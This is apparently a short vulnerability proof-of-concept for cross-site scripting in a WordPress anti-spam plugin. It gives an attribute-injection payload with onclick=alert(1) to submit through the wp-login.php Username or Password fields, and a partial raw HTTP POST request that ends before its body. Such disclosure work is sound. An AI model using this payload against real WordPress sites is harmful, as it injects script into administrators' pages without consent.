From an IP not in the Allow List (wp-admin/admin.php?page=ss_allow_list), make a request with a spam word, and add an XSS payload, such as ad" accesskey=X onclick=alert(1) "

An input such as ad">TEST can also be used to prove the injection which will result in TEST" /> being displayed in the page

This can be achieved via the wp-login.php form for example, either in the Username or Password fields.

POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1